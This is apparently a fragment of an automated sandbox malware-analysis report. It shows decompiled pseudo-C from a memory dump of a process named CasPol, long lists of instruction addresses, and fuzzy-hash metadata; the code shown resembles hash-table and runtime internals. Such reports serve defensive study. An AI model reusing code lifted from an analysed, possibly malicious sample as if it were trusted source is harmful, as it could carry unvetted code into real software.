																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01484CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0140D130(_t427, _t494, _t511);
				}
			}










































































                                                                        0x01485ba5
                                                                        0x01485baa
                                                                        0x01485baf
                                                                        0x01485bb4
                                                                        0x01485bb6
                                                                        0x01485bbc
                                                                        0x01485bbe
                                                                        0x01485bc4
                                                                        0x01485bcd
                                                                        0x01485bd3
                                                                        0x01485bd6
                                                                        0x01485bdc
                                                                        0x01485be0
                                                                        0x01485be3
                                                                        0x01485beb
                                                                        0x01485bf2
                                                                        0x01485bf8
                                                                        0x01485bfe
                                                                        0x01485c04
                                                                        0x01485c0e
                                                                        0x01485c18
                                                                        0x01485c1f
                                                                        0x01485c25
                                                                        0x01485c2a
                                                                        0x01485c2c
                                                                        0x01485c32
                                                                        0x01485c3a
                                                                        0x01485c3f
                                                                        0x01485c42
                                                                        0x01485c48
                                                                        0x01485c5b
                                                                        0x01485c5b
                                                                        0x01485c2c
                                                                        0x01485cb7
                                                                        0x01485cb9
                                                                        0x01485cbf
                                                                        0x01485cc2
                                                                        0x01485cca
                                                                        0x01485ccb
                                                                        0x01485ccb
                                                                        0x01485cd1
                                                                        0x01485cd7
                                                                        0x01485cda
                                                                        0x01485ce1
                                                                        0x01485ce4
                                                                        0x01485ce7
                                                                        0x01485ced
                                                                        0x01485cf3
                                                                        0x01485cf9
                                                                        0x01485cff
                                                                        0x01485d08
                                                                        0x01485d0a
                                                                        0x01485d0e
                                                                        0x01485d10
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01485d16
                                                                        0x01485d1a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01485d20
                                                                        0x01485d22
                                                                        0x01485d25
                                                                        0x01485d2f
                                                                        0x01485d2f
                                                                        0x01485d33
                                                                        0x01485d3d
                                                                        0x01485d49
                                                                        0x01485d4b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01485d5a
                                                                        0x01485d5d
                                                                        0x01485d60
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01485d66
                                                                        0x01485d69
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01485d6f
                                                                        0x01485d6f
                                                                        0x01485d73
                                                                        0x01485d79
                                                                        0x01485d7f
                                                                        0x01485d86
                                                                        0x01485d95
                                                                        0x01485d98
                                                                        0x01485dba
                                                                        0x01485dcb
                                                                        0x01485dce
                                                                        0x01485dd3
                                                                        0x01485dd6
                                                                        0x01485dd8
                                                                        0x01485de6
                                                                        0x01485dec
                                                                        0x01485dee
                                                                        0x01485df1
                                                                        0x01485df3
                                                                        0x0148635a
                                                                        0x0148635a
                                                                        0x00000000
                                                                        0x0148635a
                                                                        0x01485dfe
                                                                        0x01485e02
                                                                        0x01485e05
                                                                        0x01485e07
                                                                        0x01485e10
                                                                        0x01485e13
                                                                        0x01485e1b
                                                                        0x01485e1c
                                                                        0x01485e21
                                                                        0x01485e22
                                                                        0x01485e23
                                                                        0x01485e25
                                                                        0x01485e2a
                                                                        0x01485e2c
                                                                        0x01485e2e
                                                                        0x01485e36
                                                                        0x01485e39
                                                                        0x01485e42
                                                                        0x01485e47
                                                                        0x01485e4d
                                                                        0x01485e54
                                                                        0x01485e54
                                                                        0x01485e54
                                                                        0x01485e2e
                                                                        0x01485e5c
                                                                        0x01485e5f
                                                                        0x01485e62
                                                                        0x01485e64
                                                                        0x01485e6b
                                                                        0x01485e70
                                                                        0x01485e7a
                                                                        0x01485e7a
                                                                        0x01485e7a
                                                                        0x01485e6b
                                                                        0x01485e7e
                                                                        0x01485e7f
                                                                        0x01485e7f
                                                                        0x01485e81
                                                                        0x01485e87
                                                                        0x01485e8b
                                                                        0x01485e8c
                                                                        0x01485e8c
                                                                        0x01485e8c
                                                                        0x01485e9a
                                                                        0x01485e9c
                                                                        0x01485ea2
                                                                        0x01485ea6
                                                                        0x01485f50
                                                                        0x01485f50
                                                                        0x01485f57
                                                                        0x01485f66
                                                                        0x01485f66
                                                                        0x01485f66
                                                                        0x01485f68
                                                                        0x01485f6a
                                                                        0x014863d0
                                                                        0x00000000
                                                                        0x01485f70
                                                                        0x01485f70
                                                                        0x01485f91
                                                                        0x01485f9c
                                                                        0x01485f9e
                                                                        0x01485fa4
                                                                        0x01485fa6
                                                                        0x0148638c
                                                                        0x01486392
                                                                        0x014863a1
                                                                        0x014863a7
                                                                        0x014863af
                                                                        0x014863af
                                                                        0x014863bd
                                                                        0x014863d8
                                                                        0x00000000
                                                                        0x014863d8
                                                                        0x01485fac
                                                                        0x01485fb2
                                                                        0x01485fb4
                                                                        0x01485fbd
                                                                        0x01485fc6
                                                                        0x01485fce
                                                                        0x01485fd4
                                                                        0x01485fdc
                                                                        0x01485fec
                                                                        0x01485fed
                                                                        0x01485fee
                                                                        0x01485fef
                                                                        0x01485ff9
                                                                        0x01485ffa
                                                                        0x01485ffb
                                                                        0x01485ffc
                                                                        0x01486000
                                                                        0x01486004
                                                                        0x01486012
                                                                        0x01486012
                                                                        0x01486018
                                                                        0x01486019
                                                                        0x0148601a
                                                                        0x0148601b
                                                                        0x0148601c
                                                                        0x01486020
                                                                        0x01486059
                                                                        0x0148605c
                                                                        0x01486061
                                                                        0x01486061
                                                                        0x01486022
                                                                        0x01486022
                                                                        0x01486022
                                                                        0x01486025
                                                                        0x0148602a
                                                                        0x0148602b
                                                                        0x01486031
                                                                        0x01486037
                                                                        0x01486038
                                                                        0x0148603e
                                                                        0x01486048
                                                                        0x01486049
                                                                        0x0148604a
                                                                        0x0148604b
                                                                        0x0148604c
                                                                        0x0148604d
                                                                        0x01486053
                                                                        0x01486054
                                                                        0x01486054
                                                                        0x01486062
                                                                        0x01486065
                                                                        0x01486067
                                                                        0x0148606a
                                                                        0x01486070
                                                                        0x01486075
                                                                        0x01486076
                                                                        0x01486081
                                                                        0x01486087
                                                                        0x01486095
                                                                        0x01486099
                                                                        0x0148609e
                                                                        0x014860a4
                                                                        0x014860ae
                                                                        0x014860b0
                                                                        0x014860b3
                                                                        0x014860b6
                                                                        0x014860b8
                                                                        0x014860ba
                                                                        0x014860ba
                                                                        0x014860ba
                                                                        0x014860ba
                                                                        0x014860be
                                                                        0x014860c0
                                                                        0x014860c5
                                                                        0x014860c5
                                                                        0x014860c5
                                                                        0x014860c6
                                                                        0x014860cd
                                                                        0x01486114
                                                                        0x014860cf
                                                                        0x014860cf
                                                                        0x014860d4
                                                                        0x014860d5
                                                                        0x014860da
                                                                        0x014860db
                                                                        0x014860e1
                                                                        0x014860e2
                                                                        0x014860e8
                                                                        0x014860f8
                                                                        0x014860fd
                                                                        0x014860fe
                                                                        0x01486102
                                                                        0x01486104
                                                                        0x01486107
                                                                        0x01486109
                                                                        0x0148610b
                                                                        0x0148610b
                                                                        0x0148610b
                                                                        0x0148610b
                                                                        0x0148610f
                                                                        0x0148610f
                                                                        0x01486117
                                                                        0x0148611a
                                                                        0x0148611f
                                                                        0x01486125
                                                                        0x01486134
                                                                        0x01486139
                                                                        0x0148613f
                                                                        0x01486146
                                                                        0x01486148
                                                                        0x0148614b
                                                                        0x0148614d
                                                                        0x0148614f
                                                                        0x0148614f
                                                                        0x0148614f
                                                                        0x0148614f
                                                                        0x01486153
                                                                        0x01486159
                                                                        0x01486159
                                                                        0x0148615c
                                                                        0x01486163
                                                                        0x01486169
                                                                        0x0148616c
                                                                        0x01486172
                                                                        0x01486181
                                                                        0x01486186
                                                                        0x01486187
                                                                        0x0148618b
                                                                        0x01486191
                                                                        0x01486195
                                                                        0x014861a3
                                                                        0x014861bb
                                                                        0x014861c0
                                                                        0x014861c3
                                                                        0x014861cc
                                                                        0x014861d0
                                                                        0x014861dc
                                                                        0x014861de
                                                                        0x014861e1
                                                                        0x014861e4
                                                                        0x014861e6
                                                                        0x014861e8
                                                                        0x014861e8
                                                                        0x014861e8
                                                                        0x014861e8
                                                                        0x014861e6
                                                                        0x014861ec
                                                                        0x014861f3
                                                                        0x01486203
                                                                        0x01486209
                                                                        0x0148620a
                                                                        0x01486216
                                                                        0x0148621d
                                                                        0x01486227
                                                                        0x01486241
                                                                        0x01486246
                                                                        0x0148624c
                                                                        0x01486257
                                                                        0x01486259
                                                                        0x0148625c
                                                                        0x0148625e
                                                                        0x01486260
                                                                        0x01486260
                                                                        0x01486260
                                                                        0x01486260
                                                                        0x0148625e
                                                                        0x01486264
                                                                        0x01486267
                                                                        0x01486269
                                                                        0x01486315
                                                                        0x01486315
                                                                        0x0148631b
                                                                        0x0148631e
                                                                        0x01486324
                                                                        0x01486327
                                                                        0x0148632f
                                                                        0x01486330
                                                                        0x01486333
                                                                        0x0148633a
                                                                        0x0148633c
                                                                        0x01486335
                                                                        0x01486335
                                                                        0x01486335
                                                                        0x0148633f
                                                                        0x01486342
                                                                        0x0148634c
                                                                        0x01486352
                                                                        0x01486355
                                                                        0x01486355
                                                                        0x01486359
                                                                        0x00000000
                                                                        0x0148626f
                                                                        0x01486275
                                                                        0x01486275
                                                                        0x01486278
                                                                        0x0148627e
                                                                        0x0148627e
                                                                        0x01486281
                                                                        0x01486287
                                                                        0x0148628d
                                                                        0x01486298
                                                                        0x0148629c
                                                                        0x014862a2
                                                                        0x0148629e
                                                                        0x0148629e
                                                                        0x0148629e
                                                                        0x014862a7
                                                                        0x014862a7
                                                                        0x014862aa
                                                                        0x014862b0
                                                                        0x014862f0
                                                                        0x014862f0
                                                                        0x014862f2
                                                                        0x014862f8
                                                                        0x014862fd
                                                                        0x014862b2
                                                                        0x014862b2
                                                                        0x014862b2
                                                                        0x014862b5
                                                                        0x014862dd
                                                                        0x014862e2
                                                                        0x014862e5
                                                                        0x014862b7
                                                                        0x014862b8
                                                                        0x014862bb
                                                                        0x014862bd
                                                                        0x014862c0
                                                                        0x014862c4
                                                                        0x014862cd
                                                                        0x014862cd
                                                                        0x014862c0
                                                                        0x014862bb
                                                                        0x014862b5
                                                                        0x01486302
                                                                        0x01486303
                                                                        0x01486305
                                                                        0x01486305
                                                                        0x01486305
                                                                        0x0148630c
                                                                        0x0148630c
                                                                        0x00000000
                                                                        0x0148627e
                                                                        0x01486269
                                                                        0x01485eac
                                                                        0x01485ebb
                                                                        0x01485ebe
                                                                        0x01485ecb
                                                                        0x01485ecb
                                                                        0x01485ece
                                                                        0x01485ece
                                                                        0x01485ed4
                                                                        0x01485ed7
                                                                        0x01485ed9
                                                                        0x01485edb
                                                                        0x01485edb
                                                                        0x01485ee1
                                                                        0x01485ee1
                                                                        0x01485ee3
                                                                        0x01485f20
                                                                        0x01485f20
                                                                        0x01485ee5
                                                                        0x01485ee5
                                                                        0x01485ee5
                                                                        0x01485ee8
                                                                        0x01485f11
                                                                        0x01485f18
                                                                        0x01485eea
                                                                        0x01485eea
                                                                        0x01485eed
                                                                        0x01485ef2
                                                                        0x01485ef8
                                                                        0x01485efb
                                                                        0x01485f0a
                                                                        0x01485f0a
                                                                        0x01485eed
                                                                        0x01485ee8
                                                                        0x01485f22
                                                                        0x01485f28
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01485f30
                                                                        0x01485f31
                                                                        0x01485f37
                                                                        0x01485f3a
                                                                        0x01485f3d
                                                                        0x01485f44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01485f46
                                                                        0x01485f48
                                                                        0x01485f4d
                                                                        0x00000000
                                                                        0x01485f4d
                                                                        0x01485dda
                                                                        0x01485ddf
                                                                        0x00000000
                                                                        0x01485ddf
                                                                        0x01485dd8
                                                                        0x01485da7
                                                                        0x01485da9
                                                                        0x01485dac
                                                                        0x01485dae
                                                                        0x00000000
                                                                        0x01485db4
                                                                        0x01485db4
                                                                        0x00000000
                                                                        0x01485db4
                                                                        0x01485dae
                                                                        0x01485d88
                                                                        0x01485d8d
                                                                        0x01486363
                                                                        0x01486369
                                                                        0x0148636a
                                                                        0x01486370
                                                                        0x01486372
                                                                        0x0148637a
                                                                        0x0148637b
                                                                        0x0148637d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148637f
                                                                        0x01486385
                                                                        0x00000000
                                                                        0x01486385
                                                                        0x01485d38
                                                                        0x01485d3b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01485d3b
                                                                        0x01485d27
                                                                        0x01485d29
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01486360
                                                                        0x00000000
                                                                        0x01486360
                                                                        0x01485c10
                                                                        0x01485c10
                                                                        0x014863da
                                                                        0x014863e5
                                                                        0x014863e5

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2492261637a948ef0acbbad22d4e92333e4c86487a6e5426f83456e1cc7daab1
                                                                        • Instruction ID: 8bbdde8787e00280c16bbdd58bcb3f0c653a537c6048125461c34604a45da3de
                                                                        • Opcode Fuzzy Hash: 2492261637a948ef0acbbad22d4e92333e4c86487a6e5426f83456e1cc7daab1
                                                                        • Instruction Fuzzy Hash: C8423875900229CFDB64DF68C880BAEBBB1FF49304F1581AAD94DAB352E7349985CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0148E824 Relevance: .5, Instructions: 493COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 50%
                                                                        			E0148E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x14ad360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L013DFAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E013DFA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x14ab1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E013D2280(E013FF3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E013CFFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x14ab1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E013FB640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E013EF3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x14ab1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x14ab1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E0148E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E0148E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E0148E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E013DFA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E0148E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}






































































                                                                        0x0148e833
                                                                        0x0148e839
                                                                        0x0148e83e
                                                                        0x0148e841
                                                                        0x0148e848
                                                                        0x0148e84b
                                                                        0x0148e851
                                                                        0x0148e8b2
                                                                        0x0148e8b2
                                                                        0x0148e8b5
                                                                        0x0148e90b
                                                                        0x0148e911
                                                                        0x0148e913
                                                                        0x0148e913
                                                                        0x0148e91a
                                                                        0x0148e91d
                                                                        0x0148e922
                                                                        0x0148e924
                                                                        0x0148e924
                                                                        0x0148e924
                                                                        0x0148e92f
                                                                        0x0148e933
                                                                        0x0148e935
                                                                        0x0148e93a
                                                                        0x0148e940
                                                                        0x0148e948
                                                                        0x0148e950
                                                                        0x0148e955
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e957
                                                                        0x0148e95c
                                                                        0x0148e9cb
                                                                        0x0148e9d2
                                                                        0x0148e9d4
                                                                        0x0148e9f2
                                                                        0x0148e9f6
                                                                        0x0148ea10
                                                                        0x0148ea18
                                                                        0x0148ea1a
                                                                        0x0148ea1f
                                                                        0x0148ea2c
                                                                        0x0148ea2d
                                                                        0x0148ea2e
                                                                        0x0148ea32
                                                                        0x0148ea3d
                                                                        0x0148ea42
                                                                        0x0148ea45
                                                                        0x0148ea51
